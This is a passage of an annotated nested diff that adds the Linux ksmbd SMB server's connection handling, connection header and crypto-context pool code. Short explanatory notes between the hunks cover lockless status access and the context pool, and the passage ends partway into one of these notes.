++int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
++				     __u8 *pi_hash);
++int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
++		      __u8 *pi_hash);
++#endif
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+new file mode 100644
+index 0000000000000..e1d2be19cddfa
+--- /dev/null
++++ b/fs/smb/server/connection.c
+@@ -0,0 +1,485 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <namjae.jeon@protocolfreedom.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/mutex.h>
++#include <linux/freezer.h>
++#include <linux/module.h>
++
++#include "server.h"
++#include "smb_common.h"
++#include "mgmt/ksmbd_ida.h"
++#include "connection.h"
++#include "transport_tcp.h"
++#include "transport_rdma.h"
++
++static DEFINE_MUTEX(init_lock);
++
++static struct ksmbd_conn_ops default_conn_ops;
++
++LIST_HEAD(conn_list);
++DECLARE_RWSEM(conn_list_lock);
++
++/**
++ * ksmbd_conn_free() - free resources of the connection instance
++ *
++ * @conn:	connection instance to be cleaned up
++ *
++ * During thread termination, the corresponding conn instance's
++ * resources (sock/memory) are released and finally the conn object is freed.
++ */
++void ksmbd_conn_free(struct ksmbd_conn *conn)
++{
++	down_write(&conn_list_lock);
++	list_del(&conn->conns_list);
++	up_write(&conn_list_lock);
++
++	xa_destroy(&conn->sessions);
++	kvfree(conn->request_buf);
++	kfree(conn->preauth_info);
++	kfree(conn);
++}
++
++/**
++ * ksmbd_conn_alloc() - initialize a new connection instance
++ *
++ * Return:	ksmbd_conn struct on success, otherwise NULL
++ */
++struct ksmbd_conn *ksmbd_conn_alloc(void)
++{
++	struct ksmbd_conn *conn;
++
++	conn = kzalloc(sizeof(struct ksmbd_conn), GFP_KERNEL);
++	if (!conn)
++		return NULL;
++
++	conn->need_neg = true;
++	ksmbd_conn_set_new(conn);
++	conn->local_nls = load_nls("utf8");
++	if (!conn->local_nls)
++		conn->local_nls = load_nls_default();
++	if (IS_ENABLED(CONFIG_UNICODE))
++		conn->um = utf8_load(UNICODE_AGE(12, 1, 0));
++	else
++		conn->um = ERR_PTR(-EOPNOTSUPP);
++	if (IS_ERR(conn->um))
++		conn->um = NULL;
++	atomic_set(&conn->req_running, 0);
++	atomic_set(&conn->r_count, 0);
++	conn->total_credits = 1;
++	conn->outstanding_credits = 0;
++
++	init_waitqueue_head(&conn->req_running_q);
++	init_waitqueue_head(&conn->r_count_q);
++	INIT_LIST_HEAD(&conn->conns_list);
++	INIT_LIST_HEAD(&conn->requests);
++	INIT_LIST_HEAD(&conn->async_requests);
++	spin_lock_init(&conn->request_lock);
++	spin_lock_init(&conn->credits_lock);
++	ida_init(&conn->async_ida);
++	xa_init(&conn->sessions);
++
++	spin_lock_init(&conn->llist_lock);
++	INIT_LIST_HEAD(&conn->lock_list);
++
++	down_write(&conn_list_lock);
++	list_add(&conn->conns_list, &conn_list);
++	up_write(&conn_list_lock);
++	return conn;
++}
++
++bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
++{
++	struct ksmbd_conn *t;
++	bool ret = false;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(t, &conn_list, conns_list) {
++		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
++			continue;
++
++		ret = true;
++		break;
++	}
++	up_read(&conn_list_lock);
++	return ret;
++}
++
++void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct list_head *requests_queue = NULL;
++
++	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE) {
++		requests_queue = &conn->requests;
++		work->syncronous = true;
++	}
++
++	if (requests_queue) {
++		atomic_inc(&conn->req_running);
++		spin_lock(&conn->request_lock);
++		list_add_tail(&work->request_entry, requests_queue);
++		spin_unlock(&conn->request_lock);
++	}
++}
++
++int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	int ret = 1;
++
++	if (list_empty(&work->request_entry) &&
++	    list_empty(&work->async_request_entry))
++		return 0;
++
++	if (!work->multiRsp)
++		atomic_dec(&conn->req_running);
++	spin_lock(&conn->request_lock);
++	if (!work->multiRsp) {
++		list_del_init(&work->request_entry);
++		if (!work->syncronous)
++			list_del_init(&work->async_request_entry);
++		ret = 0;
++	}
++	spin_unlock(&conn->request_lock);
++
++	wake_up_all(&conn->req_running_q);
++	return ret;
++}
++
++void ksmbd_conn_lock(struct ksmbd_conn *conn)
++{
++	mutex_lock(&conn->srv_mutex);
++}
++
++void ksmbd_conn_unlock(struct ksmbd_conn *conn)
++{
++	mutex_unlock(&conn->srv_mutex);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
++{
++	struct ksmbd_conn *conn;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		if (conn->binding || xa_load(&conn->sessions, sess_id))
++			WRITE_ONCE(conn->status, status);
++	}
++	up_read(&conn_list_lock);
++}
++
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
++{
++	struct ksmbd_conn *bind_conn;
++
++	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(bind_conn, &conn_list, conns_list) {
++		if (bind_conn == conn)
++			continue;
++
++		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
++		    !ksmbd_conn_releasing(bind_conn) &&
++		    atomic_read(&bind_conn->req_running)) {
++			wait_event(bind_conn->req_running_q,
++				atomic_read(&bind_conn->req_running) == 0);
++		}
++	}
++	up_read(&conn_list_lock);
++}
++
++int ksmbd_conn_write(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	size_t len = 0;
++	int sent;
++	struct kvec iov[3];
++	int iov_idx = 0;
++
++	if (!work->response_buf) {
++		pr_err("NULL response header\n");
++		return -EINVAL;
++	}
++
++	if (work->tr_buf) {
++		iov[iov_idx] = (struct kvec) { work->tr_buf,
++				sizeof(struct smb2_transform_hdr) + 4 };
++		len += iov[iov_idx++].iov_len;
++	}
++
++	if (work->aux_payload_sz) {
++		iov[iov_idx] = (struct kvec) { work->response_buf, work->resp_hdr_sz };
++		len += iov[iov_idx++].iov_len;
++		iov[iov_idx] = (struct kvec) { work->aux_payload_buf, work->aux_payload_sz };
++		len += iov[iov_idx++].iov_len;
++	} else {
++		if (work->tr_buf)
++			iov[iov_idx].iov_len = work->resp_hdr_sz;
++		else
++			iov[iov_idx].iov_len = get_rfc1002_len(work->response_buf) + 4;
++		iov[iov_idx].iov_base = work->response_buf;
++		len += iov[iov_idx++].iov_len;
++	}
++
++	ksmbd_conn_lock(conn);
++	sent = conn->transport->ops->writev(conn->transport, &iov[0],
++					iov_idx, len,
++					work->need_invalidate_rkey,
++					work->remote_key);
++	ksmbd_conn_unlock(conn);
++
++	if (sent < 0) {
++		pr_err("Failed to send message: %d\n", sent);
++		return sent;
++	}
++
++	return 0;
++}
++
++int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
++			 void *buf, unsigned int buflen,
++			 struct smb2_buffer_desc_v1 *desc,
++			 unsigned int desc_len)
++{
++	int ret = -EINVAL;
++
++	if (conn->transport->ops->rdma_read)
++		ret = conn->transport->ops->rdma_read(conn->transport,
++						      buf, buflen,
++						      desc, desc_len);
++	return ret;
++}
++
++int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
++			  void *buf, unsigned int buflen,
++			  struct smb2_buffer_desc_v1 *desc,
++			  unsigned int desc_len)
++{
++	int ret = -EINVAL;
++
++	if (conn->transport->ops->rdma_write)
++		ret = conn->transport->ops->rdma_write(conn->transport,
++						       buf, buflen,
++						       desc, desc_len);
++	return ret;
++}
++
++bool ksmbd_conn_alive(struct ksmbd_conn *conn)
++{
++	if (!ksmbd_server_running())
++		return false;
++
++	if (ksmbd_conn_exiting(conn))
++		return false;
++
++	if (kthread_should_stop())
++		return false;
++
++	if (atomic_read(&conn->stats.open_files_count) > 0)
++		return true;
++
++	/*
++	 * Stop the current session if the time since the last client
++	 * request exceeds the user-configured deadtime and the open
++	 * file count is zero.
++	 */
++	if (server_conf.deadtime > 0 &&
++	    time_after(jiffies, conn->last_active + server_conf.deadtime)) {
++		ksmbd_debug(CONN, "No response from client in %lu minutes\n",
++			    server_conf.deadtime / SMB_ECHO_INTERVAL);
++		return false;
++	}
++	return true;
++}
++
++#define SMB1_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb_hdr))
++#define SMB2_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb2_hdr) + 4)
++
++/**
++ * ksmbd_conn_handler_loop() - session thread to listen for new SMB requests
++ * @p:		connection instance
++ *
++ * One thread per connection
++ *
++ * Return:	0 on success
++ */
++int ksmbd_conn_handler_loop(void *p)
++{
++	struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
++	struct ksmbd_transport *t = conn->transport;
++	unsigned int pdu_size, max_allowed_pdu_size;
++	char hdr_buf[4] = {0,};
++	int size;
++
++	mutex_init(&conn->srv_mutex);
++	__module_get(THIS_MODULE);
++
++	if (t->ops->prepare && t->ops->prepare(t))
++		goto out;
++
++	conn->last_active = jiffies;
++	while (ksmbd_conn_alive(conn)) {
++		if (try_to_freeze())
++			continue;
++
++		kvfree(conn->request_buf);
++		conn->request_buf = NULL;
++
++		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
++		if (size != sizeof(hdr_buf))
++			break;
++
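++		/*
++		 * Direct-TCP framing sketch (assuming RFC 1002 style
++		 * session messages): byte 0 is the message type (zero
++		 * for a session message) and bytes 1-3 carry the PDU
++		 * length in network byte order, hence the 0x00FFFFFF
++		 * ceiling checked below.
++		 */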
++		pdu_size = get_rfc1002_len(hdr_buf);
++		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
++
++		if (ksmbd_conn_good(conn))
++			max_allowed_pdu_size =
++				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
++		else
++			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
++
++		if (pdu_size > max_allowed_pdu_size) {
++			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
++					pdu_size, max_allowed_pdu_size,
++					READ_ONCE(conn->status));
++			break;
++		}
++
++		/*
++		 * Check against the maximum PDU size (0x00FFFFFF).
++		 */
++		if (pdu_size > MAX_STREAM_PROT_LEN)
++			break;
++
++		if (pdu_size < SMB1_MIN_SUPPORTED_HEADER_SIZE)
++			break;
++
++		/* 4 for rfc1002 length field */
++		/* 1 for implied bcc[0] */
++		size = pdu_size + 4 + 1;
++		conn->request_buf = kvmalloc(size, GFP_KERNEL);
++		if (!conn->request_buf)
++			break;
++
++		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
++
++		/*
++		 * We already read 4 bytes to find out PDU size, now
++		 * read in PDU
++		 */
++		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
++		if (size < 0) {
++			pr_err("sock_read failed: %d\n", size);
++			break;
++		}
++
++		if (size != pdu_size) {
++			pr_err("PDU error. Read: %d, Expected: %d\n",
++			       size, pdu_size);
++			continue;
++		}
++
++		if (!ksmbd_smb_request(conn))
++			break;
++
++		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
++		    SMB2_PROTO_NUMBER) {
++			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
++				break;
++		}
++
++		if (!default_conn_ops.process_fn) {
++			pr_err("No connection request callback\n");
++			break;
++		}
++
++		if (default_conn_ops.process_fn(conn)) {
++			pr_err("Cannot handle request\n");
++			break;
++		}
++	}
++
++out:
++	ksmbd_conn_set_releasing(conn);
++	/* Wait till all references to the Server object are dropped */
++	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
++
++	if (IS_ENABLED(CONFIG_UNICODE))
++		utf8_unload(conn->um);
++	unload_nls(conn->local_nls);
++	if (default_conn_ops.terminate_fn)
++		default_conn_ops.terminate_fn(conn);
++	t->ops->disconnect(t);
++	module_put(THIS_MODULE);
++	return 0;
++}
++
++void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops)
++{
++	default_conn_ops.process_fn = ops->process_fn;
++	default_conn_ops.terminate_fn = ops->terminate_fn;
++}
++
++int ksmbd_conn_transport_init(void)
++{
++	int ret;
++
++	mutex_lock(&init_lock);
++	ret = ksmbd_tcp_init();
++	if (ret) {
++		pr_err("Failed to init TCP subsystem: %d\n", ret);
++		goto out;
++	}
++
++	ret = ksmbd_rdma_init();
++	if (ret) {
++		pr_err("Failed to init RDMA subsystem: %d\n", ret);
++		goto out;
++	}
++out:
++	mutex_unlock(&init_lock);
++	return ret;
++}
++
++static void stop_sessions(void)
++{
++	struct ksmbd_conn *conn;
++	struct ksmbd_transport *t;
++
++again:
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		struct task_struct *task;
++
++		t = conn->transport;
++		task = t->handler;
++		if (task)
++			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
++				    task->comm, task_pid_nr(task));
++		ksmbd_conn_set_exiting(conn);
++		if (t->ops->shutdown) {
++			up_read(&conn_list_lock);
++			t->ops->shutdown(t);
++			down_read(&conn_list_lock);
++		}
++	}
++	up_read(&conn_list_lock);
++
++	if (!list_empty(&conn_list)) {
++		schedule_timeout_interruptible(HZ / 10); /* 100ms */
++		goto again;
++	}
++}
++
++void ksmbd_conn_transport_destroy(void)
++{
++	mutex_lock(&init_lock);
++	ksmbd_tcp_destroy();
++	ksmbd_rdma_destroy();
++	stop_sessions();
++	mutex_unlock(&init_lock);
++}
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+new file mode 100644
+index 0000000000000..ad8dfaa48ffb3
+--- /dev/null
++++ b/fs/smb/server/connection.h
+@@ -0,0 +1,231 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_CONNECTION_H__
++#define __KSMBD_CONNECTION_H__
++
++#include <linux/list.h>
++#include <linux/ip.h>
++#include <net/sock.h>
++#include <net/tcp.h>
++#include <net/inet_connection_sock.h>
++#include <net/request_sock.h>
++#include <linux/kthread.h>
++#include <linux/nls.h>
++#include <linux/unicode.h>
++
++#include "smb_common.h"
++#include "ksmbd_work.h"
++
++#define KSMBD_SOCKET_BACKLOG		16
++
++enum {
++	KSMBD_SESS_NEW = 0,
++	KSMBD_SESS_GOOD,
++	KSMBD_SESS_EXITING,
++	KSMBD_SESS_NEED_RECONNECT,
++	KSMBD_SESS_NEED_NEGOTIATE,
++	KSMBD_SESS_RELEASING
++};
++
++struct ksmbd_stats {
++	atomic_t			open_files_count;
++	atomic64_t			request_served;
++};
++
++struct ksmbd_transport;
++
++struct ksmbd_conn {
++	struct smb_version_values	*vals;
++	struct smb_version_ops		*ops;
++	struct smb_version_cmds		*cmds;
++	unsigned int			max_cmds;
++	struct mutex			srv_mutex;
++	int				status;
++	unsigned int			cli_cap;
++	char				*request_buf;
++	struct ksmbd_transport		*transport;
++	struct nls_table		*local_nls;
++	struct unicode_map		*um;
++	struct list_head		conns_list;
++	/* smb session 1 per user */
++	struct xarray			sessions;
++	unsigned long			last_active;
++	/* How many requests are currently running */
++	atomic_t			req_running;
++	/* References made to this Server object */
++	atomic_t			r_count;
++	unsigned int			total_credits;
++	unsigned int			outstanding_credits;
++	spinlock_t			credits_lock;
++	wait_queue_head_t		req_running_q;
++	wait_queue_head_t		r_count_q;
++	/* Lock to protect the requests list */
++	spinlock_t			request_lock;
++	struct list_head		requests;
++	struct list_head		async_requests;
++	int				connection_type;
++	struct ksmbd_stats		stats;
++	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
++	struct ntlmssp_auth		ntlmssp;
++
++	spinlock_t			llist_lock;
++	struct list_head		lock_list;
++
++	struct preauth_integrity_info	*preauth_info;
++
++	bool				need_neg;
++	unsigned int			auth_mechs;
++	unsigned int			preferred_auth_mech;
++	bool				sign;
++	bool				use_spnego:1;
++	__u16				cli_sec_mode;
++	__u16				srv_sec_mode;
++	/* dialect index that server chose */
++	__u16				dialect;
++
++	char				*mechToken;
++
++	struct ksmbd_conn_ops	*conn_ops;
++
++	/* Preauth Session Table */
++	struct list_head		preauth_sess_table;
++
++	struct sockaddr_storage		peer_addr;
++
++	/* Identifier for async message */
++	struct ida			async_ida;
++
++	__le16				cipher_type;
++	__le16				compress_algorithm;
++	bool				posix_ext_supported;
++	bool				signing_negotiated;
++	__le16				signing_algorithm;
++	bool				binding;
++};
++
++struct ksmbd_conn_ops {
++	int	(*process_fn)(struct ksmbd_conn *conn);
++	int	(*terminate_fn)(struct ksmbd_conn *conn);
++};
++
++struct ksmbd_transport_ops {
++	int (*prepare)(struct ksmbd_transport *t);
++	void (*disconnect)(struct ksmbd_transport *t);
++	void (*shutdown)(struct ksmbd_transport *t);
++	int (*read)(struct ksmbd_transport *t, char *buf,
++		    unsigned int size, int max_retries);
++	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
++		      int size, bool need_invalidate_rkey,
++		      unsigned int remote_key);
++	int (*rdma_read)(struct ksmbd_transport *t,
++			 void *buf, unsigned int len,
++			 struct smb2_buffer_desc_v1 *desc,
++			 unsigned int desc_len);
++	int (*rdma_write)(struct ksmbd_transport *t,
++			  void *buf, unsigned int len,
++			  struct smb2_buffer_desc_v1 *desc,
++			  unsigned int desc_len);
++};
++
++struct ksmbd_transport {
++	struct ksmbd_conn		*conn;
++	struct ksmbd_transport_ops	*ops;
++	struct task_struct		*handler;
++};
++
++#define KSMBD_TCP_RECV_TIMEOUT	(7 * HZ)
++#define KSMBD_TCP_SEND_TIMEOUT	(5 * HZ)
++#define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
++
++extern struct list_head conn_list;
++extern struct rw_semaphore conn_list_lock;
++
++bool ksmbd_conn_alive(struct ksmbd_conn *conn);
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
++struct ksmbd_conn *ksmbd_conn_alloc(void);
++void ksmbd_conn_free(struct ksmbd_conn *conn);
++bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
++int ksmbd_conn_write(struct ksmbd_work *work);
++int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
++			 void *buf, unsigned int buflen,
++			 struct smb2_buffer_desc_v1 *desc,
++			 unsigned int desc_len);
++int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
++			  void *buf, unsigned int buflen,
++			  struct smb2_buffer_desc_v1 *desc,
++			  unsigned int desc_len);
++void ksmbd_conn_enqueue_request(struct ksmbd_work *work);
++int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
++void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
++int ksmbd_conn_handler_loop(void *p);
++int ksmbd_conn_transport_init(void);
++void ksmbd_conn_transport_destroy(void);
++void ksmbd_conn_lock(struct ksmbd_conn *conn);
++void ksmbd_conn_unlock(struct ksmbd_conn *conn);
++
++/*
++ * WARNING
++ *
++ * This is a hack. We will move status to a proper place once we land
++ * multi-session support.
++ */
++static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
++}
++
++static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
++}
++
++static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
++}
++
++static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
++}
++
++static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
++}
++
++static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
++}
++
++static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
++}
++
++static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
++}
++
++static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
++}
++
++static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
++}
++
++static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
++#endif /* __CONNECTION_H__ */
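A note on the status accessors above: conn->status is read and written without a lock, so every access goes through READ_ONCE()/WRITE_ONCE() to keep the compiler from tearing, re-reading, or caching the value. A minimal sketch of the same pattern on a hypothetical structure (not ksmbd code):

#include <linux/compiler.h>

enum obj_state { STATE_IDLE, STATE_BUSY };

struct obj { enum obj_state state; };

static inline bool obj_busy(struct obj *o)
{
	/* one-shot load; safe against a concurrent WRITE_ONCE() writer */
	return READ_ONCE(o->state) == STATE_BUSY;
}

static inline void obj_set_busy(struct obj *o)
{
	/* single untorn store; readers see the old or new value, nothing else */
	WRITE_ONCE(o->state, STATE_BUSY);
}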
+diff --git a/fs/smb/server/crypto_ctx.c b/fs/smb/server/crypto_ctx.c
+new file mode 100644
+index 0000000000000..81488d04199da
+--- /dev/null
++++ b/fs/smb/server/crypto_ctx.c
+@@ -0,0 +1,266 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/string.h>
++#include <linux/err.h>
++#include <linux/slab.h>
++#include <linux/wait.h>
++#include <linux/sched.h>
++
++#include "glob.h"
++#include "crypto_ctx.h"
++
++struct crypto_ctx_list {
++	spinlock_t		ctx_lock;
++	int			avail_ctx;
++	struct list_head	idle_ctx;
++	wait_queue_head_t	ctx_wait;
++};
++
++static struct crypto_ctx_list ctx_list;
++
++static inline void free_aead(struct crypto_aead *aead)
++{
++	if (aead)
++		crypto_free_aead(aead);
++}
++
++static void free_shash(struct shash_desc *shash)
++{
++	if (shash) {
++		crypto_free_shash(shash->tfm);
++		kfree(shash);
++	}
++}
++
++static struct crypto_aead *alloc_aead(int id)
++{
++	struct crypto_aead *tfm = NULL;
++
++	switch (id) {
++	case CRYPTO_AEAD_AES_GCM:
++		tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
++		break;
++	case CRYPTO_AEAD_AES_CCM:
++		tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
++		break;
++	default:
++		pr_err("Does not support encrypt ahead(id : %d)\n", id);
++		return NULL;
++	}
++
++	if (IS_ERR(tfm)) {
++		pr_err("Failed to alloc encrypt aead : %ld\n", PTR_ERR(tfm));
++		return NULL;
++	}
++
++	return tfm;
++}
++
++static struct shash_desc *alloc_shash_desc(int id)
++{
++	struct crypto_shash *tfm = NULL;
++	struct shash_desc *shash;
++
++	switch (id) {
++	case CRYPTO_SHASH_HMACMD5:
++		tfm = crypto_alloc_shash("hmac(md5)", 0, 0);
++		break;
++	case CRYPTO_SHASH_HMACSHA256:
++		tfm = crypto_alloc_shash("hmac(sha256)", 0, 0);
++		break;
++	case CRYPTO_SHASH_CMACAES:
++		tfm = crypto_alloc_shash("cmac(aes)", 0, 0);
++		break;
++	case CRYPTO_SHASH_SHA256:
++		tfm = crypto_alloc_shash("sha256", 0, 0);
++		break;
++	case CRYPTO_SHASH_SHA512:
++		tfm = crypto_alloc_shash("sha512", 0, 0);
++		break;
++	default:
++		return NULL;
++	}
++
++	if (IS_ERR(tfm))
++		return NULL;
++
++	shash = kzalloc(sizeof(*shash) + crypto_shash_descsize(tfm),
++			GFP_KERNEL);
++	if (!shash)
++		crypto_free_shash(tfm);
++	else
++		shash->tfm = tfm;
++	return shash;
++}
++
++static void ctx_free(struct ksmbd_crypto_ctx *ctx)
++{
++	int i;
++
++	for (i = 0; i < CRYPTO_SHASH_MAX; i++)
++		free_shash(ctx->desc[i]);
++	for (i = 0; i < CRYPTO_AEAD_MAX; i++)
++		free_aead(ctx->ccmaes[i]);
++	kfree(ctx);
++}
++
++static struct ksmbd_crypto_ctx *ksmbd_find_crypto_ctx(void)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	while (1) {
++		spin_lock(&ctx_list.ctx_lock);
++		if (!list_empty(&ctx_list.idle_ctx)) {
++			ctx = list_entry(ctx_list.idle_ctx.next,
++					 struct ksmbd_crypto_ctx,
++					 list);
++			list_del(&ctx->list);
++			spin_unlock(&ctx_list.ctx_lock);
++			return ctx;
++		}
++
++		if (ctx_list.avail_ctx > num_online_cpus()) {
++			spin_unlock(&ctx_list.ctx_lock);
++			wait_event(ctx_list.ctx_wait,
++				   !list_empty(&ctx_list.idle_ctx));
++			continue;
++		}
++
++		ctx_list.avail_ctx++;
++		spin_unlock(&ctx_list.ctx_lock);
++
++		ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
++		if (!ctx) {
++			spin_lock(&ctx_list.ctx_lock);
++			ctx_list.avail_ctx--;
++			spin_unlock(&ctx_list.ctx_lock);
++			wait_event(ctx_list.ctx_wait,
++				   !list_empty(&ctx_list.idle_ctx));
++			continue;
++		}
++		break;
++	}
++	return ctx;
++}
++
++void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx)
++{
++	if (!ctx)
++		return;
++
++	spin_lock(&ctx_list.ctx_lock);
++	if (ctx_list.avail_ctx <= num_online_cpus()) {
++		list_add(&ctx->list, &ctx_list.idle_ctx);
++		spin_unlock(&ctx_list.ctx_lock);
++		wake_up(&ctx_list.ctx_wait);
++		return;
++	}
++
++	ctx_list.avail_ctx--;
++	spin_unlock(&ctx_list.ctx_lock);
++	ctx_free(ctx);
++}
++
++static struct ksmbd_crypto_ctx *____crypto_shash_ctx_find(int id)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	if (id >= CRYPTO_SHASH_MAX)
++		return NULL;
++
++	ctx = ksmbd_find_crypto_ctx();
++	if (ctx->desc[id])
++		return ctx;
++
++	ctx->desc[id] = alloc_shash_desc(id);
++	if (ctx->desc[id])
++		return ctx;
++	ksmbd_release_crypto_ctx(ctx);
++	return NULL;
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACMD5);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACSHA256);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_CMACAES);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA256);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA512);
++}
++
++static struct ksmbd_crypto_ctx *____crypto_aead_ctx_find(int id)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	if (id >= CRYPTO_AEAD_MAX)
++		return NULL;
++
++	ctx = ksmbd_find_crypto_ctx();
++	if (ctx->ccmaes[id])
++		return ctx;
++
++	ctx->ccmaes[id] = alloc_aead(id);
++	if (ctx->ccmaes[id])
++		return ctx;
++	ksmbd_release_crypto_ctx(ctx);
++	return NULL;
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void)
++{
++	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_GCM);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void)
++{
++	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_CCM);
++}
++
++void ksmbd_crypto_destroy(void)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	while (!list_empty(&ctx_list.idle_ctx)) {
++		ctx = list_entry(ctx_list.idle_ctx.next,
++				 struct ksmbd_crypto_ctx,
++				 list);
++		list_del(&ctx->list);
++		ctx_free(ctx);
++	}
++}
++
++int ksmbd_crypto_create(void)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	spin_lock_init(&ctx_list.ctx_lock);
++	INIT_LIST_HEAD(&ctx_list.idle_ctx);
++	init_waitqueue_head(&ctx_list.ctx_wait);
++	ctx_list.avail_ctx = 1;
++
++	ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
++	if (!ctx)
++		return -ENOMEM;
++	list_add(&ctx->list, &ctx_list.idle_ctx);
++	return 0;
++}
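The allocator above keeps the number of live crypto contexts bounded: a caller either grabs an idle context, allocates a new one while under the num_online_cpus() cap, or sleeps on ctx_wait until a release wakes it. A userspace analogy of that bounded-pool shape, assuming invented names and sizes (this is not ksmbd code):

#include <pthread.h>
#include <stdlib.h>

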